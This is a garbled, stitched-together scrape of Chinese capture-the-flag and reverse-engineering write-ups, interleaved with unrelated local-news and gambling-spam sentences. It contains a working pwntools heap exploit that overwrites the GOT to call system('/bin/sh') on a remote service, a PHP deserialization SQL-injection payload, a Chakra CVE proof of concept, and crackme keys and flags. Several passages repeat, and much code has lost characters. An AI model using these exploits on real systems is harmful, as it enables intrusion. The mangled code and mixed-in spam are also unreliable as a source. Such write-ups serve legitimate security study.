word_41BC68;x=dword_41BC64;a6=dword_41BC70;w=dword_41BC74;bytes_to_big(34,ptr,z);cinstr(v4,code);if(mr_compare(v4,v2)=0){power(v4,5,v2,w);memset(v29,0,sizeof(v29));if(big_to_bytes(34,w,v29,1)==34){bytes_to_big(17,v29,x);bytes_to_big(17,v29[17],y);convert(0,a2_1);convert(1,a6);v17=1;if(ecurve2_init(131,13,2,1,a2_1,a6,0,0)){qmemcpy(v46,51C99BFA6F18DE467C80C23B98C7994AA,sizeof(v46));qmemcpy(v47,42EA2D112ECEC71FCF7E000D7EFC978BD,sizeof(v47));qmemcpy(v44,6C997F3E7F2C66A4A5D2FDA13756A37B1,sizeof(v44));qmemcpy(v43,4A38D11829D32D347BD0C0F584D546E9A,sizeof(v43));qmemcpy(v45,200000000000000004D4FDD5703A3F269,sizeof(v45));v30=dword_418118;v31=word_41811C;memset(v32,0,sizeof(v32));v33=0;v34=dword_4180E4;v35=byte_4180E8;memset(v36,0,sizeof(v36));v37=0;v38=0;v40=dword_4180F0;v39=dword_4180EC;memset(v41,0,sizeof(v41));a1=0;memset(v49,0,sizeof(v49));v50=0;v51=0;i=0;v6=a1;a3=(char*)mds;lpMem=(flash)v30;do{strcpy(v6,a2);strcat(v6,-);strcat(v6,(constchar*)lpMem);xmd5(v6,strlen(v6),a3,i+1);v6+=256;++i;lpMem+=4;a3+=16;}while(i3);md0=mirvar(0);md1=mirvar(0);md2=mirvar(0);x1=mirvar(0);a3a=mirvar(0);x2=mirvar(0);lpMema=mirvar(0);v9=mirvar(0);ep1=epoint_init();ep2=epoint_init();p1=epoint_init();p2=epoint_init();epInput=epoint_init();if(epoint2_set(x,y,0,epInput)){cinstr(x1,v46);cinstr(a3a,v47);epoint2_set(x1,a3a,0,ep1);cinstr(x2,v44);cinstr(lpMema,v43);epoint2_set(x2,lpMema,0,ep2);bytes_to_big(16,(_BYTE*)mds,md0);bytes_to_big(16,mds[1],md1);bytes_to_big(16,mds[2],md2);ecurve2_mult(md2,ep1,p1);ecurve2_mult(md2,ep2,p2);ecurve2_add(epInput,p1);ecurve2_add(epInput,p2);ecurve2_mult(md0,p1,p1);ecurve2_mult(md1,p2,p2);epoint2_get(p1,x1,a3a);epoint2_get(p2,x2,lpMema);cinstr(v9,v45);divide(x1,v9,v9);divide(x2,v9,v9);v17=3;if(!mr_compare(x1,x2))v17=0;}else{v17=2;}mirkill(md0);mirkill(md1);mirkill(md2);mirkill(x1);mirkill(x2);mirkill(a3a);mirkill(lpMema);mirkill(v9);epoint_free(ep1);epoint_free(ep2);epoint_free(p1);epoint_free(p2);epoint_free(epInput);}mirexit();result=v17;}else{mirexit();result=1;}}else{mirexit();result=1;}returnresult;}2.计算(md2*ep1+epInput)*md0modn==(md2*ep2+epInput)*md1modn=epInput=(md2*md1*ep2-md2*md0*ep1)*(((md0-md1)^-1)modn)得到(02D23461BA71B50AF182DC76E5A7C726F5,07BE013AF19BD185BCD20BB341EA31298B)voidtest2(){biga2=mirvar(0);biga6=mirvar(1);if(ecurve2_init(131,13,2,1,a2,a6,0,0)){epoint*epInput=epoint_init();bigx=mirvar(0);bigy=mirvar(0);bigmd0=mirvar(0);bigmd1=mirvar(0);bigmd2=mirvar(0);cinstr(md0,51C75F1F444BAA97ED18DD6C340835D7);cinstr(md1,0E5CF7F068D6EFA16F42F935EC424A75);cinstr(md2,A4CD1D64486ABDE1BE441944460CD41D);epoint*p1=epoint_init();bigx1=mirvar(0);bigy1=mirvar(0);cinstr(x1,51C99BFA6F18DE467C80C23B98C7994AA);cinstr(y1,42EA2D112ECEC71FCF7E000D7EFC978BD);epoint2_set(x1,y1,0,p1);epoint*p2=epoint_init();bigx2=mirvar(0);bigy2=mirvar(0);cinstr(x2,6C997F3E7F2C66A4A5D2FDA13756A37B1);cinstr(y2,4A38D11829D32D347BD0C0F584D546E9A);epoint2_set(x2,y2,0,p2);bign=mirvar(0);cinstr(n,200000000000000004D4FDD5703A3F269);ecurve2_mult(md2,p2,p2);ecurve2_mult(md1,p2,p2);ecurve2_mult(md2,p1,p1);ecurve2_mult(md0,p1,p1);ecurve2_sub(p1,p2);bigr=mirvar(0);bigrd=mirvar(0);bignd=mirvar(0);bigz=mirvar(0);subtract(md0,md1,r);xgcd(r,n,rd,nd,z);ecurve2_mult(rd,p2,epInput);epoint2_get(epInput,x,y);charsx[256];charsy[256];cotstr(x,sx);cotstr(y,sy);printf(%s,sx);printf(%s,sy);}}用RDLP计算得到code7A7102F36F3B344D666132A6FF7EF4BA05B99640BB815C9E712A72C64B6ABC582C2最近两年越来越多的安全人员开始投入到IoT设备的研究热中,常见的研究方向包括路由器、摄像头、汽车等。,全区稻渔综合种养形成10种典型模式,发展格局由点扩展到面、从局部扩展到全区。,但这个样本有明显的特征:解析PE结构,所以当我们遇到这种样本的时候,可以考虑为反射式DLL注入。攻击服务器:,通过漏洞将bot程序植入扫描服务器收集的设备中下图显示了上述4个IP的流量模式:Iot_reaper中集成的9个IoT漏洞攻击与使用弱密码破解的Mirai不同,IoT_reaper利用多个物联网设备漏洞感染物联网设备。  男女混合团体赛2016年被正式列为世界杯团体赛比赛项目,中国队派出了彭昭杰、高盼、张梦宇、田间4人出战。   李新元强调,坚持领导挂帅、高位推动,是全面深化河长制工作的关键。工作集整理者(WST),是内存管理器的一个组件,它运行在KeBalanceSetManager()线程的上下文,尽力去移除进程不再使用的页并重新分配它们到有需求的其他进程。关闭优化选项,dep,aslr,safeseh(vs项目属性选择配置属性-链接器-命令行填写“/SAFESEH:NO”)我们可以试试如果和上次一样覆盖掉返回地址当执行到Security_Check_Cookie的时候,他会检查栈Cookies和.data的副本,这时候GS就分发系统异常处理请求然后就由系统接管处理你这个异常我们可以先用mona插件查看程序当前seh链表这个地址指向的就是PointertonextSEHrecord下面的SEhander是ntdll中的系统接管处理。搜索源码以寻找在哪里使用到了这些命令:cd/dzidongdalujigrep-rinamix.找到了这两个文件:smali/com/example/phoneMgr//com/example/phoneMgr/从中看到amix的操作参数,如“Incall_MusicAudioMixerMultiMedia1”。。在guest_中的act为send的代码如下:elseif($act==send){$user_id=$_SESSION[user_id]$_SESSION[user_id]:0;$rid=intval($_POST[rid]);$content=!empty($_POST[content])htmlspecialchars($_POST[content]):;$content=nl2br($content);if(empty($content)){showmsg(评论内容不能为空);}$sql="INSERTINTO".table(guest_book)."(id,rid,user_id,add_time,ip,content)VALUES(,$rid,$user_id,$timestamp,$online_ip,$content)";$db-query($sql);showmsg(恭喜您留言成功,guest__id=.$_POST[page_id]);}其中的sql语句中的$online_ip是在45行定义,$online_ip=getip();,跟踪进入到getip()中:include/(){if(getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}elseif(getenv(HTTP_X_FORWARDED_FOR)){//获取客户端用代理服务器访问时的真实ip地址$ip=getenv(HTTP_X_FORWARDED_FOR);}elseif(getenv(HTTP_X_FORWARDED)){$ip=getenv(HTTP_X_FORWARDED);}elseif(getenv(HTTP_FORWARDED_FOR)){$ip=getenv(HTTP_FORWARDED_FOR);}elseif(getenv(HTTP_FORWARDED)){$ip=getenv(HTTP_FORWARDED);}else{$ip=$_SERVER[REMOTE_ADDR];}return$ip;}所以这是一个很明显的XFF的漏洞。  该局紧密跟踪城市建设和发展情况,靠前服务,做好供电保障。,payload为:O:6:"HITCON":5:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:65:"unionselectpassword,1,1fromuserswhereusername=orange#";}s:12:"%00HITCON%00conn";i:0;}其中的%00并不是表示三个字符,表示得chr(0)一个字符,所以需要进行转换。最后GitHub地址:参考《WindowsPE权威指南》源码参考:*测试时使用的DLL为该源码编译的DLL。 ,16=len(sn)=:00402723calledi;:00402725cmpal,:00402727mov[esp+esi+104h+var_B4],:0040272Bjzshortloc_:0040272Daddesi,:00402730cmpesi,:00402733jlshortloc_:00402735mov[esp+esi+104h+var_B4],:0040273Aaddesi,:0040273Dcmpesi,:00402740jaloc_4029DDdes加密,其中多个常数表被替换key="*2017*10"des_cbc_encrypt(sn,key).text:00402771calldes_cbc_:0045AE9CPC1_:0045AED4LOOP_:0045AEE4PC2_:0045AF18IP_:0045AF58E_:0045AF88P_:0045AFA8IPR_:0045AFE8S_Boxsn高4位与低4位与换,转换为16进制字符串.text:004027B0pushesi....text:00402806jbshortloc_4027B0sn计算.text:00402808callmirvar....text:00402876callsub_4022E0bigx=mirvar(0);bigv=mirvar(173);bigy=mirvar(1817);bytes_to_big(len,sn,x);multiply(x,v,x);fft_mult(x,y,y);power(y,2,y);decr(y,1001,y);v=mirvar(317)multiply(y,v,y);//4022E0是用c的浮点函数计算的sn=((sn*173*1817)^2-1001)*317sn=reverse(sn)luajit计算.text:004028F0pushoffsetaLuajit210Beta3;"".text:004028F5push917h;:004028FApushoffsetbyte_45A578;:004028FFpushesi;:00402900callluaL_::::0040290AcallluaJIT_:0040290Fpush0;:00402911push0;:00402913push0;:00402915pushesi;:00402916calllua_:0040291Baddesp,:0040291Etesteax,:00402920jnzshortloc_:::00402924calllua_:00402929pushoffsetaXut;"xut".text:::00402934calllua_:00402939pushoffsetaMyst;"myst".text:::00402944calllua_:00402949push0;:0040294Bpush1;:0040294Dpush0;:0040294Fpushesi;:00402950calllua_pcall....text:00402986push0FFFFFFFFh;:00402988pushesi;:00402989calllua_:0040298Eaddesp,:00402991testeax,:00402993jzshortloc_:00402995push0FFFFFFFFh;:00402997pushesi;:00402998calllua_:0040299Daddesp,:004029A0jmpshortloc_:004029A2moveax,[esp+104h+var_F0].text:004029A6testeax,:004029A8jzshortloc_4029B1xut=snifmyst()==1thenokmyst():x=xutx+=101*1001+(10101+1001*99)*100x*=983751509373x-=1023*13+1203*13*14+1230*13*14*15+1231*13*14*15*16x=(x+1)*2expected=1574592838300862641516215149137548264158058079230003764126382984039489925466995870724568174393389905601620735902909057604303543552180706761904if(x==expected)return1elsereturn0luajit分析根据luaJIT_setmode定位到lj_dispatch_update函数从lj_dispatch_update定位到lj_vm_asm_begin与lj_bc_ofs在lj_vm_asm_begin+lj_bc_ofs[i]处下断,分析各个bytecode的功能.text:0040AFCEcalllj_dispatch_:0040ACA9movzxesi,ds:lj_bc_ofs+:0040ACB0movzxedi,ds:lj_bc_ofs+:0040ACB7movzxebp,ds:lj_bc_ofs+:0040ACBEmovzxeax,ds:lj_bc_ofs+:0040ACC5addesi,offsetlj_vm_asm_:0040ACCBaddedi,offsetlj_vm_asm_:0040ACD1addebp,offsetlj_vm_asm_:0040ACD7addeax,offsetlj_vm_asm_beginKXCTF201710BYLoudy08:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11AWaitBlockList字段指向了KWAIT_BLOCK数组结构,下才能用来等待一到多个对象。澳门信誉赌场,2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。原标题:贯彻落实绿色发展理念切实保护绿水青山发挥西江黄金水道优势带动各项事业发展  11月8日,市委书记、我市江河湖库总河长李新元到郁江巡河并调研两岸各项建设。 CVE-2016-7200标签(空格分隔):ChakraPOCclassdummy{constructor(){return[1,2,3];}}classMyArrayextendsArray{staticget[](){returndummy;}}vara=newMyArray({},[],"natalie",7,7,7,7,7);functiontest(i){returntrue;}varo=(test);调试boolSparseArraySegmentT::IsMissingItem(constT*value){return*value==SparseArraySegmentT::GetMissingItem();}其中左值为0x0000000200000001,右值为0x8000000280000002value实际指向ArraySegment,其中length=3,size=6,元素为1、2、30x00000170823BC5100000000000000003........0x00000170823BC5180000000600000000........0x00000170823BC5200000000000000000........0x00000170823BC5280000000100000002........0x00000170823BC5300000000380000002.......\n0x00000170823BC5388000000280000002......\n对应于poc中定义的(test);会调用()filter()方法创建一个新数组,其包含通过所提供函数实现的测试的所有元素。2015年11月,示范区里的“荷田水乡”荣获农业部颁发的全国休闲农业与乡村旅游示范点称号。关闭优化选项,dep,aslr,safeseh(vs项目属性选择配置属性-链接器-命令行填写“/SAFESEH:NO”)我们可以试试如果和上次一样覆盖掉返回地址当执行到Security_Check_Cookie的时候,他会检查栈Cookies和.data的副本,这时候GS就分发系统异常处理请求然后就由系统接管处理你这个异常我们可以先用mona插件查看程序当前seh链表这个地址指向的就是PointertonextSEHrecord下面的SEhander是ntdll中的系统接管处理。。当安装CaseCreators更新时,相应的缓解已经配置在你的机器上了。  去年,港北区招商引资快马加鞭,签约落户项目49个、投资额亿元,利用内资亿元、外资亿美元,完成项目策划28个,2015-2017年累计入驻标房万平方米、累计开工项目92个、累计竣工投资亿元项目47个。 ,我们发现,大部分的根通常是从老generation到年轻generation的参照。先说一下如何过反调试,调试环境为ida和android模拟器,ida卡到不行啊,羡慕有真机的。如果页被访问过,那么字段就被重置为0。使用开放源码的加密模块作为此次攻击的一部分并不令人惊讶,因为Forcepoint安全实验室之前曾经评论过恶意软件中会同时重用恶意代码和合法代码()。?Arch:amd64-64-littleRELRO:PartialRELROStack:CanaryfoundNX:NXenabledPIE:PIEenabled1:newbox1~box52:deletefree完之后没有修改in_use标志,可以多次free,存在UAF,只有box2和box3可以free3:edit4:print5:guessseed=seed;srand((unignedint)seed);v=rand();if(input()==v)printseed;elseprintv;解题思路我这个解法好像有点麻烦,等结束后学习下标准解法是什么样的..leakprocessbase,leaklibcbase,overwritegot,getshelltest_####*seed=0;intmain(){seed=seed;srand(*(unsignedint*)seed);printf("%p",seed);printf("0x%x",rand());return0;}guess_####*seed=0;intmain(intargc,char**argv){intlow3=atoi(argv[1]);intr=atoi(argv[2]);unsignedintseed;unsignedinti;for(i=0;i=0xFFFFF;i++){seed=i12;seed+=low3;srand(seed);if(rand()==r){printf("0x%x",rand());return0;}}printf("end");return0;}###=Truefrompwnimport*importsyscontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./club)ifargs[LOCAL]:libc_path=/lib/x86_64-linux-gnu/io=process(./club)("processbase:"+hex(()[/root/Desktop/test/pediy_pwn/club]))("processlibc_base:"+hex(()[libc_path]))else:libc_path=./io=remote(,8888)libc=ELF(libc_path)defcmd_new(index,size):()(1)()(str(index))()(str(size))()returndefcmd_delete(index):()(2)()(str(index))returndefcmd_edit(index,buf):()(3)()(str(index))(buf)returndefcmd_print(index):()(4)()(str(index))data=()returndatadefcmd_guess_wrong(v):()(5)()(str(v))(Thenumberis)data=(!)[:-1]returndatadefcmd_guess_right(v):()(5)()(str(v))(Yougetasecret:)data=(!)[:-1]returndatadefcmd_quit(name):()(6)()(name)()returndefexploit():#leakprocessbasev=cmd_guess_wrong(0)p_guess=process([./guess_seed,str(0x148),v])guess_r=p_()#printguess_rseed=cmd_guess_right(int(guess_r,16))#printhex(int(v))process_base=int(seed)-("leakedprocessbase:"+hex(process_base))#(io)#input()#triggercoaleace#usebox4toeditbox2box3len2=0x1A0len3=0x1F0cmd_new(2,len2)cmd_edit(2,A*len2)cmd_new(3,len3)cmd_delete(2)cmd_delete(3)cmd_new(4,len2+len3)data=cmd_print(4)[:6]libc_main_arena_top=0x3C4B78libc_base=u64((8,\x00))-libc_main_arena_topprint(leakedlibc_base:%x%libc_base)#createafakefreechunkinsidebox2beforebox3box2_ptr=process_base+0x202110print(box2_ptr:%x%box2_ptr)buf=buf+=p64(0)+p64(len2+1)+p64(box2_ptr-0x18)+p64(box2_ptr-0x10)buf+=A*(len2-0x20)buf+=p64(len2)buf+=p64(len3)cmd_edit(4,buf)cmd_delete(3)#box2_ptr-0x18writtentobox2_ptrcmd_edit(3,/bin/sh\x00)#[box2]=got_freebuf=buf+=p64(0)buf+=p64(0)#box0buf+=p64(0)#box1buf+=p64(process_base+[free])cmd_edit(2,buf)#[got_free]=systembuf=buf+=p64(libc_base+[system])cmd_edit(2,buf)#system(/bin/sh)cmd_delete(3)()returnexploit()通过下面两个请求的uri可以泄露账号和密码,美国网件系列默认用户名admin已经被复制过的实时对象被认为是中间generation的一部分,并被提升到老generation。,:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A通过下面两个请求的uri可以泄露账号和密码,美国网件系列默认用户名admin处理逻辑encode1是base64,encode2和encode3比较简单,略过sn=encode3(sn)+encode2(sn)+encode1(sn)publicclassMainextendsac{...protectedvoidonCreate(){();...//这个不懂为什么没生效,生效的是基类那个(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassuvextendscc{...protectedvoidonCreate(BundlesavedInstanceState){(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassua{static{(enjoy);}...publicstaticnativeintcheck(uathis,Stringarg1){}}处理逻辑JNI_OnLoad中有两个校验和反调试的地方,静态分析的时候直接nop掉,安装完后再替换掉就可以正常调试了(有检测dexsignature和TracerPid什么的).text:00001F4CBLcheck_:00001F50BLcheck_threadso中的check函数.text:00001F38MOVSR3,#:00001F3CLDRR5,[R2,R3].text:00001F3ELDRR2,=(off_5E54-0x1F48).text:00001F40MOVSR0,:00001F42MOVSR3,#:00001F44ADDR2,PCoff_::00005E54off_5E54JNINativeMethodbyte_5E60,aLjavaLangStrin,check+1len(sn)=120,原始sn长度范围(x+x+x/3*4=120):11~36从结果来看原始sn长度是36,但是我后面是从11开始穷举的,浪费了大量的时间.mytext:0000313ELDRR1,[R5].mytext:00003140MOVSR3,#:00003144LDRR3,[R1,R3].mytext:00003146MOVSR2,#:00003148MOVSR1,:0000314AMOVSR0,::0000314EMOVSR6,:00003150BLj_j_strlen_:00003154STRR4,[SP,#0x50+var_4C].mytext:00003156MOVSR1,#:00003158CMPR0,#:0000315ABGTloc_:0000315CADDR4,SP,#0x50+:0000315EMOVSR2,#:00003160MOVSR0,:00003162BLj_j_memset_:00003166MOVSR1,:00003168MOVSR2,#:0000316AMOVSR0,:0000316CBLj_j_memcpy_:00003170LDRR2,[R5].mytext:00003172MOVSR3,#:00003176LDRR3,[R2,R3].mytext:00003178MOVSR1,:0000317AMOVSR2,:0000317CMOVSR0,::00003180MOVSR0,:00003182BLj_j_strlen_:00003186MOVSR1,:00003188MOVSR0,:0000318ABLcheck_snBYTEbuf[40];BYTEkey1[8];BYTEkey2[16];CopyMemory(buf,sn,36);FillMemory(buf+36,0x04,0x04);des_enc(buf,sizeof(buf),key1);(这里des_set_key在处理PC2_Table的时候与标准有偏差)CopyMemory(key2[12],buf[32],4);rc6_encrypt(buf,32,key2,sizeof(key2));(这个不常碰到,跟了一遍)memcmp(buf,expected,32)==0rc6与标准的区别:Q:0x9e3779b9L=0x61C88647L处理前和处理后都进行了byteswap32signedint__fastcallcheck_sn(constvoid*a1,size_ta2){...if(a2==36){v6=j_j_malloc(0x28u);v7=v6;if(v6){j_j_memcpy(v6,v3,v4);v7[36]=4;v7[37]=4;v7[38]=4;v7[39]=4;do{v8=g_key1[v2];v9=0;do{v17[8*v2+v9]=(v8(7-v9))1;++v9;}while(v9!=8);++v2;}while(v2!=8);des_set_key((int)v17);v10=0;do{v11=v7[v10];j_j_memcpy(dest,v7[v10],8u);v15=0;v16=0;des_1840((int)dest,(int)v15);v10+=8;j_j_memcpy(v11,v15,8u);}while(v10!=40);update_key2((int)g_key2,(int)v15);rc6_encrypt(v7,0x20u,(int)g_key2,16);v12=0;while((unsigned__int8)v7[v12]==byte_5D3D[v12]){if(++v12==32){result=1;gotoLABEL_14;}}}}result=0;...}3.穷举sn以kxuectf{开头,以}结尾这里直接按sn长度为36位来穷举了voidDes_SetKey(constcharKey[8]){staticboolK[64];staticboolKL[56];staticboolKR[56];ByteToBit(K,Key,64);Transform(K,K,PC1_Table,56);CopyMemory(KL[0],K[0],28);CopyMemory(KL[28],K[0],28);CopyMemory(KR[0],K[28],28);CopyMemory(KR[28],K[28],28);intoffset=0;for(inti=0;ii++){offset+=LOOP_Table[i];boolTmp[256];for(intn=0;nn++){if(PC2_Table[n]=28){Tmp[n]=KR[PC2_Table[n]-1-28+offset];}else{Tmp[n]=KL[PC2_Table[n]-1+offset];}}memcpy(SubKey[i],Tmp,48);}}voidtest_sn36(){constchar*charset=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789{}constchar*charset2=^_`mEJCTNKOGWRSFYVLZQAH[\\]upibejctnkogwrsfyvlzqahmdxKOGWRSFYVLuiconstchar*charset3=NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm76543210}{intsn_len=36;intindices[36];charsn[40]=BYTEkey1[8]={0xFD,0xB4,0x68,0x54,0x08,0xCD,0x56,0x4E};BYTEkey2[16]={0x65,0x48,0x32,0xEF,0xBA,0xCD,0x56,0x4E,0x0F,0x9B,0x1D,0x27,0x00,0x00,0x00,0x00};CopyMemory(sn,kxuectf{,8);strings1=encode3((PBYTE)sn,8);for(intk1=0;k164;k1++){for(intk2=0;k264;k2++){for(intk3=0;k364;k3++){BYTEexpected[32]={0x42,0xD3,0xC3,0xC2,0xF1,0x2A,0xE9,0x2D,0x66,0xC9,0x28,0x22,0x2C,0xEB,0x54,0x0E,0x94,0x07,0xE5,0x77,0x4A,0x92,0xB7,0x92,0x2E,0x5D,0xFD,0xF0,0xF3,0x54,0x9F,0xC6};BYTEbuf1[8];buf1[0]=charset3[k1];buf1[1]=charset3[k2];buf1[2]=charset3[k3];buf1[3]=charset3[63];FillMemory(buf1+4,4,0x04);des_encrypt(buf1,8,key1);CopyMemory(key2[12],buf1,4);rc6_decrypt(expected,sizeof(expected),key2);des_decrypt(expected,sizeof(expected),key1);if(memcmp(expected,_str(),8)==0){CopyMemory(sn,expected,32);sn[32]=charset3[k1];sn[33]=charset3[k2];sn[34]=charset3[k3];sn[35]=charset3[63];sn[sn_len]=0;conver_charset(sn,sn_len,indices,charset,charset3);printf(%s,sn);}}}}}kxuectf{D3crypted1sV3rylntere5tin91} 共签约引进电动车项目75家,计划总投资亿元,已建成投产45家,其中爱玛电动车项目的落户,有力地加快了中国-东盟新能源电动车生产基地的发展。同时,三方每年组织员工进行联谊交流,促进环卫、公交队伍建设。  在政策利好、地方主动作为背景下,2017年贵港市的企业投资环境满意度跃升至广西第一名,贵港市新能源汽车等新兴产业发展也由此驶上快车道。  去年,港北区招商引资快马加鞭,签约落户项目49个、投资额亿元,利用内资亿元、外资亿美元,完成项目策划28个,2015-2017年累计入驻标房万平方米、累计开工项目92个、累计竣工投资亿元项目47个。老虎机破解单线程Cheney半空间复制在M62之前,V8使用了单线程Cheney半空间复制算法,它非常适合单核执行和分代方案。但这个样本有明显的特征:解析PE结构,所以当我们遇到这种样本的时候,可以考虑为反射式DLL注入。 ,lsb=(N==dynsymcount-1)||((dl_new_hash(name[N])%nbuckets)!=(dl_new_hash(name[N+1])%nbuckets))hashval=(dl_new_hash(name)~1)|lsb;使用GNUHash查询符号下列展示了一个符号怎样在使用了GNUhashsection的对象中查找的过程。共签约引进电动车项目75家,计划总投资亿元,已建成投产45家,其中爱玛电动车项目的落户,有力地加快了中国-东盟新能源电动车生产基地的发展。2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。 忘录内容为:凡我市行政辖区范围内的环卫机构在职员工,只要穿着经市环卫处认定的环卫服装,均可免费乘坐市区开行的普通公交线路(不包括定制公交、学生公交等特殊个性线路)。此PowerShell模块还为WindowsDefender安全中心提供了一个额外的界面来配置其缓解设置。处理逻辑encode1是base64,encode2和encode3比较简单,略过sn=encode3(sn)+encode2(sn)+encode1(sn)publicclassMainextendsac{...protectedvoidonCreate(){();...//这个不懂为什么没生效,生效的是基类那个(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassuvextendscc{...protectedvoidonCreate(BundlesavedInstanceState){(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassua{static{(enjoy);}...publicstaticnativeintcheck(uathis,Stringarg1){}}处理逻辑JNI_OnLoad中有两个校验和反调试的地方,静态分析的时候直接nop掉,安装完后再替换掉就可以正常调试了(有检测dexsignature和TracerPid什么的).text:00001F4CBLcheck_:00001F50BLcheck_threadso中的check函数.text:00001F38MOVSR3,#:00001F3CLDRR5,[R2,R3].text:00001F3ELDRR2,=(off_5E54-0x1F48).text:00001F40MOVSR0,:00001F42MOVSR3,#:00001F44ADDR2,PCoff_::00005E54off_5E54JNINativeMethodbyte_5E60,aLjavaLangStrin,check+1len(sn)=120,原始sn长度范围(x+x+x/3*4=120):11~36从结果来看原始sn长度是36,但是我后面是从11开始穷举的,浪费了大量的时间.mytext:0000313ELDRR1,[R5].mytext:00003140MOVSR3,#:00003144LDRR3,[R1,R3].mytext:00003146MOVSR2,#:00003148MOVSR1,:0000314AMOVSR0,::0000314EMOVSR6,:00003150BLj_j_strlen_:00003154STRR4,[SP,#0x50+var_4C].mytext:00003156MOVSR1,#:00003158CMPR0,#:0000315ABGTloc_:0000315CADDR4,SP,#0x50+:0000315EMOVSR2,#:00003160MOVSR0,:00003162BLj_j_memset_:00003166MOVSR1,:00003168MOVSR2,#:0000316AMOVSR0,:0000316CBLj_j_memcpy_:00003170LDRR2,[R5].mytext:00003172MOVSR3,#:00003176LDRR3,[R2,R3].mytext:00003178MOVSR1,:0000317AMOVSR2,:0000317CMOVSR0,::00003180MOVSR0,:00003182BLj_j_strlen_:00003186MOVSR1,:00003188MOVSR0,:0000318ABLcheck_snBYTEbuf[40];BYTEkey1[8];BYTEkey2[16];CopyMemory(buf,sn,36);FillMemory(buf+36,0x04,0x04);des_enc(buf,sizeof(buf),key1);(这里des_set_key在处理PC2_Table的时候与标准有偏差)CopyMemory(key2[12],buf[32],4);rc6_encrypt(buf,32,key2,sizeof(key2));(这个不常碰到,跟了一遍)memcmp(buf,expected,32)==0rc6与标准的区别:Q:0x9e3779b9L=0x61C88647L处理前和处理后都进行了byteswap32signedint__fastcallcheck_sn(constvoid*a1,size_ta2){...if(a2==36){v6=j_j_malloc(0x28u);v7=v6;if(v6){j_j_memcpy(v6,v3,v4);v7[36]=4;v7[37]=4;v7[38]=4;v7[39]=4;do{v8=g_key1[v2];v9=0;do{v17[8*v2+v9]=(v8(7-v9))1;++v9;}while(v9!=8);++v2;}while(v2!=8);des_set_key((int)v17);v10=0;do{v11=v7[v10];j_j_memcpy(dest,v7[v10],8u);v15=0;v16=0;des_1840((int)dest,(int)v15);v10+=8;j_j_memcpy(v11,v15,8u);}while(v10!=40);update_key2((int)g_key2,(int)v15);rc6_encrypt(v7,0x20u,(int)g_key2,16);v12=0;while((unsigned__int8)v7[v12]==byte_5D3D[v12]){if(++v12==32){result=1;gotoLABEL_14;}}}}result=0;...}3.穷举sn以kxuectf{开头,以}结尾这里直接按sn长度为36位来穷举了voidDes_SetKey(constcharKey[8]){staticboolK[64];staticboolKL[56];staticboolKR[56];ByteToBit(K,Key,64);Transform(K,K,PC1_Table,56);CopyMemory(KL[0],K[0],28);CopyMemory(KL[28],K[0],28);CopyMemory(KR[0],K[28],28);CopyMemory(KR[28],K[28],28);intoffset=0;for(inti=0;ii++){offset+=LOOP_Table[i];boolTmp[256];for(intn=0;nn++){if(PC2_Table[n]=28){Tmp[n]=KR[PC2_Table[n]-1-28+offset];}else{Tmp[n]=KL[PC2_Table[n]-1+offset];}}memcpy(SubKey[i],Tmp,48);}}voidtest